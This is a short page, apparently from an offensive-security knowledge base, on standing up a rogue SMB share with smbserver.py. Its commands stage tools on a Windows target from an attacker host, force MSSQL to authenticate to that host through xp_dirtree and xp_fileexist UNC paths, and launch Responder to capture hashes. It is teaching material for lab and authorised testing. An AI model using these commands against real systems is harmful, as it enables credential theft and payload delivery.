Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB

Rogue SMB Server

smbserver.py starts an attacker-controlled SMB share. We use it for file transfer, payload staging in labs, and controlled UNC paths that force a Windows service or user to authenticate to us.

Anonymous share

mkdir -p /tmp/loot
smbserver.py -smb2support loot /tmp/loot

Authenticated share

smbserver.py -smb2support -username user -password pass loot /tmp/loot

Windows copy from attacker share

copy \\10.10.10.100\loot\tool.exe C:\Windows\Temp\tool.exe
dir \\10.10.10.100\loot

PowerShell copy

Copy-Item "\\10.10.10.100\loot\tool.exe" "C:\Windows\Temp\tool.exe"

Capture-oriented test path

dir \\10.10.10.100\loot

MSSQL UNC coercion example

EXEC master..xp_dirtree '\\10.10.10.100\loot',1,1;
EXEC master..xp_fileexist '\\10.10.10.100\loot\file.txt';

Responder alternative

sudo responder -I eth0

Notes

  • If the target cannot reach outbound TCP/445 to the attacker, SMB transfer and SMB authentication capture will fail.
  • In segmented networks, use HTTP, WinRM, or an internal pivot instead.